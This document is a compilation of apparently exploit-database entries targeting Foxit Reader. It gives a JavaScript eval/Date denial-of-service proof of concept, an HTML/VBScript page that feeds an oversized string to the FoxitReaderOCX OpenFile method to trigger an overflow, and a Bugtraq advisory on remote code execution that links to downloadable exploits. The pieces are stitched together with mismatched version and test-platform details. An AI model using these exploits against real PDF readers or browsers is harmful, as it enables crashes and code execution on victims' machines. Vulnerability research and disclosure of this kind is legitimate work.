Title: Foxit Reader <= 3.2.1.0401 Denial Of Service Exploit
Date: 05/04/10
Author: juza - iamjuza[at]gmail[dot]com
Software Link: http://www.foxitsoftware.com/pdf/reader/
Version: All versions <= 3.2.1.0401 have the same issue
Tested on: Windows XP SP3 x32
Description: Just open the pdf and click in the button!
Greetz: Yux, Wisezilla, GSO, thanks for all!

Code:

function DoS( pdfDate ) {
eval("new Date(" + new Array(Number.NaN,
Number.NaN).toSource().replace(/[\[\]]/g, "") + ")" );
}

DoS("DoS");


-------------------------

PoC: http://www.exploit-db.com/sploits/12080.pdf

Regards

juza

#Vendor :www.foxitsoftware.com
#tested on :[windows 7]
#Foxit Reader Version 3.1.4.1125

<html>
<object classid='clsid:05563215-225C-45EB-BB34-AFA47217B1DE' id='target' ></object>
<script language='vbscript'>

targetFile = "C:\Program Files\Foxit Software\Foxit Reader\plugins\FoxitReaderOCX.ocx"
prototype  = "Function OpenFile ( ByVal strFilePath As String ) As Boolean"
memberName = "OpenFile"
progid     = "FOXITREADEROCXLib.FoxitReaderOCX"
argCount   = 1
 
arg1=String(6164, "A")
 
target.OpenFile arg1 
 
</script>

Bugtraq ID: 36673

Published: Oct 14 2009 12:00AM
Updated: Nov 19 2009 03:25PM
Credit: mrx
Vulnerable: Foxit Reader 3.1.1 Build 0928
Foxit Foxit Reader 3.0.2009 1301
Foxit Foxit Reader 3.0 Build 1817
Foxit Foxit Reader 3.0 Build 1506
Foxit Foxit Reader 3.0


Foxit Reader is prone to a remote code-execution vulnerability because is fails to properly handle certain COM objects.

An attacker can exploit this issue by supplying a malicious PDF file or webpage. Successful exploits may allow the attacker to execute arbitrary code in the context of a user running the affected application. Failed attempts will likely result in denial-of-service conditions. 

Exploit: http://www.exploit-db.com/sploits/2009-11-22-36668.tar